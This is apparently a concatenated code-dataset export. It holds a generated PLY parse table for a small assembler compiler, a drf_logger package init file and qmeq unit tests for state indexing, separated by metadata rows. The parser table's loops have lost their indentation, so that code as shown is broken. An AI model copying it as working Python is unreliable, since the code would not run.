_lr_action_items = {'ID':([0,3,6,21,22,37,52,53,57,58,59,60,61,103,104,106,107,120,121,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[5,5,-5,52,53,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,138,139,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'NOP':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[6,6,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'ADD':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[7,7,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'AND':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[8,8,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'NOR':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[9,9,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'OR':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[10,10,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SLT':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[11,11,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SLL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[12,12,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SRL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[13,13,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SUB':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[14,14,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'ADDI':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[15,15,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'BEQ':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[16,16,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'BNE':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[17,17,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'LW':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[18,18,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SLTI':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[19,19,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SW':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[20,20,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'JAL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[21,21,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'J':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[22,22,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MOVE':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[23,23,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MPP':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[24,24,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MPPI':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[25,25,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PPXL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[26,26,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTMU':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[27,27,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTML':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[28,28,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTMD':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[29,29,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PTMR':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[30,30,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PPXLC':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[31,31,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'PMPXL':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[32,32,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'CS':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[33,33,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'SPNT':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[34,34,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'MPNT':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[35,35,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'$end':([0,1,2,3,4,6,36,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[-35,0,-1,-35,-3,-5,-2,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'DP':([5,],[37,]),'REG':([7,8,9,10,11,12,13,14,15,16,17,18,19,20,23,24,26,27,28,29,30,31,32,33,34,35,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,84,85,86,87,88,111,112,113,114,115,118,],[38,39,40,41,42,43,44,45,46,47,48,49,50,51,54,55,57,58,59,60,61,62,63,64,65,66,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,106,107,108,109,110,129,130,131,132,133,136,]),'NUM':([25,105,116,117,119,122,123,124,126,127,128,],[56,125,134,135,137,140,141,142,144,145,146,]),'COMMA':([38,39,40,41,42,43,44,45,46,47,48,49,50,51,54,55,62,63,64,65,66,83,89,90,91,92,93,94,95,96,97,98,99,100,101,102,108,109,110,],[67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,84,85,86,87,88,105,111,112,113,114,115,116,117,118,119,120,121,122,123,124,126,127,128,]),'NUMBER':([56,125,134,135,137,140,141,142,144,145,146,],[83,143,147,148,149,150,151,152,153,154,155,]),}
_lr_action = { }
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = { }
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'program':([0,],[1,]),'block':([0,3,],[2,36,]),'inst':([0,3,],[3,3,]),'empty':([0,3,],[4,4,]),}
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_goto: _lr_goto[_x] = { }
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> program","S'",1,None,None,None),
('program -> block','program',1,'p_program','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',20),
('block -> inst block','block',2,'p_block','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',26),
('block -> empty','block',1,'p_blockEmpty','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',30),
('inst -> ID DP','inst',2,'p_instTag','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',34),
('inst -> NOP','inst',1,'p_instNOP','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',38),
('inst -> ADD REG COMMA REG COMMA REG','inst',6,'p_instADD','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',44),
('inst -> AND REG COMMA REG COMMA REG','inst',6,'p_instAND','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',48),
('inst -> NOR REG COMMA REG COMMA REG','inst',6,'p_instNOR','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',52),
('inst -> OR REG COMMA REG COMMA REG','inst',6,'p_instOR','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',56),
('inst -> SLT REG COMMA REG COMMA REG','inst',6,'p_instSLT','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',60),
('inst -> SLL REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSLL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',64),
('inst -> SRL REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSRL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',68),
('inst -> SUB REG COMMA REG COMMA REG','inst',6,'p_instSUB','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',72),
('inst -> ADDI REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instADDI','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',78),
('inst -> BEQ REG COMMA REG COMMA ID','inst',6,'p_instBEQ','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',82),
('inst -> BNE REG COMMA REG COMMA ID','inst',6,'p_instBNE','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',86),
('inst -> LW REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instLW','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',90),
('inst -> SLTI REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSLTI','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',94),
('inst -> SW REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSW','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',98),
('inst -> JAL ID','inst',2,'p_instJAL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',104),
('inst -> J ID','inst',2,'p_instJ','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',108),
('inst -> MOVE REG COMMA REG','inst',4,'p_instMOVE','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',113),
('inst -> MPP REG COMMA REG','inst',4,'p_instMPP','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',120),
('inst -> MPPI NUM NUMBER COMMA NUM NUMBER','inst',6,'p_instMPPI','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',125),
('inst -> PPXL REG','inst',2,'p_instPPXL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',130),
('inst -> PTMU REG','inst',2,'p_instPTMU','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',135),
('inst -> PTML REG','inst',2,'p_instPTML','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',141),
('inst -> PTMD REG','inst',2,'p_instPTMD','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',147),
('inst -> PTMR REG','inst',2,'p_instPTMR','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',152),
('inst -> PPXLC REG COMMA REG','inst',4,'p_instPPXLC','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',157),
('inst -> PMPXL REG COMMA REG','inst',4,'p_instPMPXL','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',162),
('inst -> CS REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instCS','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',167),
('inst -> SPNT REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instSPNT','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',173),
('inst -> MPNT REG COMMA REG COMMA NUM NUMBER','inst',7,'p_instMPNT','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',178),
('empty -> <empty>','empty',0,'p_empty','c:\\Users\\estadm\\Documents\\Compilador\\analizadorSintactico.py',184),
]
| 221.569231 | 9,109 | 0.620955 | 3,131 | 14,402 | 2.824976 | 0.087193 | 0.03437 | 0.047484 | 0.083098 | 0.839797 | 0.829169 | 0.815376 | 0.605653 | 0.583267 | 0.551724 | 0 | 0.384903 | 0.034162 | 14,402 | 64 | 9,110 | 225.03125 | 0.250971 | 0.004305 | 0 | 0.036364 | 1 | 0 | 0.273753 | 0.159403 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b7937a9012d9f497511712f6cbff51a032832a95 | 158 | py | Python | drf_logger/__init__.py | thatch/drf-logger | aa6c802c29ab5274c4facbcc2ca4aed9c1c2337a | [
"MIT"
] | null | null | null | drf_logger/__init__.py | thatch/drf-logger | aa6c802c29ab5274c4facbcc2ca4aed9c1c2337a | [
"MIT"
] | null | null | null | drf_logger/__init__.py | thatch/drf-logger | aa6c802c29ab5274c4facbcc2ca4aed9c1c2337a | [
"MIT"
] | null | null | null | from drf_logger import decorators
from drf_logger import formatters
from drf_logger import mixins
from drf_logger import utils
from drf_logger import version
| 26.333333 | 33 | 0.873418 | 25 | 158 | 5.32 | 0.36 | 0.263158 | 0.488722 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126582 | 158 | 5 | 34 | 31.6 | 0.963768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b7a2e2f2c6ac58da00266f49fc6d0517ffc7dd6b | 27,609 | py | Python | qmeq/tests/test_indexing.py | M-Josefsson/qmeq | f4f08864fc778de7c14b198c0ffbaafe33ce18f6 | [
"BSD-2-Clause"
] | 16 | 2016-12-14T09:21:16.000Z | 2022-02-23T08:01:45.000Z | qmeq/tests/test_indexing.py | M-Josefsson/qmeq | f4f08864fc778de7c14b198c0ffbaafe33ce18f6 | [
"BSD-2-Clause"
] | 3 | 2018-02-03T19:13:01.000Z | 2021-06-09T14:10:28.000Z | qmeq/tests/test_indexing.py | M-Josefsson/qmeq | f4f08864fc778de7c14b198c0ffbaafe33ce18f6 | [
"BSD-2-Clause"
] | 7 | 2017-07-09T04:46:42.000Z | 2021-04-26T16:27:55.000Z | from qmeq.indexing import *
def test_binarylist_to_integer():
assert binarylist_to_integer([1, 0, 1, 1, 0, 0]) == 44
def test_integer_to_binarylist():
assert integer_to_binarylist(33) == [1, 0, 0, 0, 0, 1]
assert integer_to_binarylist(33, strq=True) == '100001'
assert integer_to_binarylist(33, binlen=8) == [0, 0, 1, 0, 0, 0, 0, 1]
assert integer_to_binarylist(33, binlen=8, strq=True) == '00100001'
def test_construct_chargelst():
assert construct_chargelst(4) == [[0],
[1, 2, 4, 8],
[3, 5, 6, 9, 10, 12],
[7, 11, 13, 14],
[15]]
def test_sz_to_ind():
assert sz_to_ind(-2, 4, 6) == 0
assert sz_to_ind( 0, 4, 6) == 1
assert sz_to_ind(+2, 4, 6) == 2
def test_szrange():
assert szrange(2, 6) == [-2, 0, 2]
assert szrange(3, 6) == [-3, -1, 1, 3]
assert szrange(4, 6) == [-2, 0, 2]
def test_empty_szlst():
assert empty_szlst(4) == [[[]],
[[], []],
[[], [], []],
[[], []],
[[]]]
assert empty_szlst(4, noneq=True) == [[None],
[None, None],
[None, None, None],
[None, None],
[None]]
def test_construct_szlst():
assert construct_szlst(4) == [[[0]],
[[1, 2], [4, 8]],
[[3], [5, 6, 9, 10], [12]],
[[7, 11], [13, 14]],
[[15]]]
def test_ssq_to_ind():
assert ssq_to_ind(2, -2) == 0
assert ssq_to_ind(2, 0) == 1
assert ssq_to_ind(2, +2) == 0
def test_ssqrange():
assert ssqrange(3, 1, 6) == [1, 3]
assert ssqrange(4, 0, 6) == [0, 2]
def test_empty_ssqlst():
assert empty_ssqlst(4) == [[[[]]],
[[[]], [[]]],
[[[]], [[], []], [[]]],
[[[]], [[]]],
[[[]]]]
assert empty_ssqlst(4, noneq=True) == [[[None]],
[[None], [None]],
[[None], [None, None], [None]],
[[None], [None]],
[[None]]]
def tezt_construct_ssqlst():
szlst = construct_szlst(4)
assert construct_ssqlst(szlst, 4) == [[[[0]]],
[[[1, 2]], [[3, 4]]],
[[[5]], [[6, 7, 8], [9]], [[10]]],
[[[11, 12]], [[13, 14]]],
[[[15]]]]
def test_flatten():
szlst = construct_szlst(4)
ssqlst = construct_ssqlst(szlst, 4)
f1 = flatten(ssqlst)
f2 = flatten(f1)
f3 = flatten(f2)
assert f1 == [[[0]], [[1, 2]], [[3, 4]], [[5]], [[6, 7, 8], [9]], [[10]], [[11, 12]], [[13, 14]], [[15]]]
assert f2 == [[0], [1, 2], [3, 4], [5], [6, 7, 8], [9], [10], [11, 12], [13, 14], [15]]
assert f3 == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
def test_enum_chargelst():
chargelst_lin = construct_chargelst(4)
assert enum_chargelst(chargelst_lin) == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15]]
def test_enum_szlst():
szlst_lin = construct_szlst(4)
assert enum_szlst(szlst_lin) == [[[0]], [[1, 2], [3, 4]], [[5], [6, 7, 8, 9], [10]], [[11, 12], [13, 14]], [[15]]]
def test_make_inverse_map():
chargelst_lin = construct_chargelst(4)
i = flatten(chargelst_lin)
assert make_inverse_map(i) == [0, 1, 2, 5, 3, 6, 7, 11, 4, 8, 9, 12, 10, 13, 14, 15]
def test_make_quantum_numbers():
si = StateIndexing(4, indexing='Lin')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(1, 2): 4, (2, 5): 12, (0, 0): 0, (3, 3): 14, (3, 0): 7, (3, 1): 11, (3, 2): 13, (2, 1): 5, (2, 4): 10, (2, 0): 3, (1, 3): 8, (2, 3): 9, (2, 2): 6, (1, 0): 1, (1, 1): 2, (4, 0): 15}
assert ind_qn == {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 0), 4: (1, 2), 5: (2, 1), 6: (2, 2), 7: (3, 0), 8: (1, 3), 9: (2, 3), 10: (2, 4), 11: (3, 1), 12: (2, 5), 13: (3, 2), 14: (3, 3), 15: (4, 0)}
#
si = StateIndexing(4, indexing='charge')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(1, 2): 3, (2, 5): 10, (0, 0): 0, (3, 3): 14, (3, 0): 11, (3, 1): 12, (3, 2): 13, (2, 1): 6, (2, 4): 9, (2, 0): 5, (1, 3): 4, (2, 3): 8, (2, 2): 7, (1, 0): 1, (1, 1): 2, (4, 0): 15}
assert ind_qn == {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (1, 2), 4: (1, 3), 5: (2, 0), 6: (2, 1), 7: (2, 2), 8: (2, 3), 9: (2, 4), 10: (2, 5), 11: (3, 0), 12: (3, 1), 13: (3, 2), 14: (3, 3), 15: (4, 0)}
#
si = StateIndexing(4, indexing='sz')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(3, -1, 1): 12, (1, 1, 0): 3, (2, -2, 0): 5, (2, 0, 3): 9, (4, 0, 0): 15, (2, 0, 2): 8, (1, -1, 0): 1, (2, 2, 0): 10, (3, 1, 0): 13, (0, 0, 0): 0, (1, -1, 1): 2, (2, 0, 1): 7, (3, 1, 1): 14, (3, -1, 0): 11, (1, 1, 1): 4, (2, 0, 0): 6}
assert ind_qn == {0: (0, 0, 0), 1: (1, -1, 0), 2: (1, -1, 1), 3: (1, 1, 0), 4: (1, 1, 1), 5: (2, -2, 0), 6: (2, 0, 0), 7: (2, 0, 1), 8: (2, 0, 2), 9: (2, 0, 3), 10: (2, 2, 0), 11: (3, -1, 0), 12: (3, -1, 1), 13: (3, 1, 0), 14: (3, 1, 1), 15: (4, 0, 0)}
#
si = StateIndexing(4, indexing='ssq')
qn_ind, ind_qn = make_quantum_numbers(si)
assert qn_ind == {(0, 0, 0, 0): 0,
(1, -1, 1, 0): 1,
(1, -1, 1, 1): 2,
(1, 1, 1, 0): 3,
(1, 1, 1, 1): 4,
(2, -2, 2, 0): 5,
(2, 0, 0, 0): 6,
(2, 0, 0, 1): 7,
(2, 0, 0, 2): 8,
(2, 0, 2, 0): 9,
(2, 2, 2, 0): 10,
(3, -1, 1, 0): 11,
(3, -1, 1, 1): 12,
(3, 1, 1, 0): 13,
(3, 1, 1, 1): 14,
(4, 0, 0, 0): 15}
assert ind_qn == {0: (0, 0, 0, 0),
1: (1, -1, 1, 0),
2: (1, -1, 1, 1),
3: (1, 1, 1, 0),
4: (1, 1, 1, 1),
5: (2, -2, 2, 0),
6: (2, 0, 0, 0),
7: (2, 0, 0, 1),
8: (2, 0, 0, 2),
9: (2, 0, 2, 0),
10: (2, 2, 2, 0),
11: (3, -1, 1, 0),
12: (3, -1, 1, 1),
13: (3, 1, 1, 0),
14: (3, 1, 1, 1),
15: (4, 0, 0, 0)}
def test_StateIndexing():
si = StateIndexing(4)
assert si.nsingle == 4
assert si.indexing == 'Lin'
assert si.ncharge == 5
assert si.nmany == 16
assert si.nleads == 0
#
for indexing in ['Lin', None]:
si = StateIndexing(4, indexing=indexing)
assert si.chargelst == [[0],[1, 2, 4, 8],[3, 5, 6, 9, 10, 12],[7, 11, 13, 14],[15]]
assert si.i == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
assert si.j == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
#
si = StateIndexing(4, indexing='charge')
assert si.chargelst_lin == [[0], [1, 2, 4, 8], [3, 5, 6, 9, 10, 12], [7, 11, 13, 14], [15]]
assert si.chargelst == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15]]
assert si.i == [0, 1, 2, 4, 8, 3, 5, 6, 9, 10, 12, 7, 11, 13, 14, 15]
assert si.j == [0, 1, 2, 5, 3, 6, 7, 11, 4, 8, 9, 12, 10, 13, 14, 15]
#
for indexing in ['sz', 'ssq']:
si = StateIndexing(4, indexing=indexing)
assert si.chargelst_lin == [[0], [1, 2, 4, 8], [3, 5, 6, 9, 10, 12], [7, 11, 13, 14], [15]]
assert si.chargelst == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15]]
assert si.szlst_lin == [[[0]], [[1, 2], [4, 8]], [[3], [5, 6, 9, 10], [12]], [[7, 11], [13, 14]], [[15]]]
assert si.szlst == [[[0]], [[1, 2], [3, 4]], [[5], [6, 7, 8, 9], [10]], [[11, 12], [13, 14]], [[15]]]
assert si.i == [0, 1, 2, 4, 8, 3, 5, 6, 9, 10, 12, 7, 11, 13, 14, 15]
assert si.j == [0, 1, 2, 5, 3, 6, 7, 11, 4, 8, 9, 12, 10, 13, 14, 15]
#
si = StateIndexing(4, indexing='ssq')
assert si.ssqlst == [[[[0]]], [[[1, 2]], [[3, 4]]], [[[5]], [[6, 7, 8], [9]], [[10]]], [[[11, 12]], [[13, 14]]], [[[15]]]]
assert si.get_state(6) == [0, 1, 0, 1]
assert si.get_state(6, linq=True) == [0, 1, 1, 0]
assert si.get_state(6, strq=True) == '0101'
assert si.get_state(6, linq=True, strq=True) == '0110'
assert si.get_ind([0, 1, 0, 1]) == 6
assert si.get_ind([0, 1, 1, 0], linq=True) == 6
assert si.get_lst(charge=2) == [5, 6, 7, 8, 9, 10]
assert si.get_lst(charge=2, sz=0) == [6, 7, 8, 9]
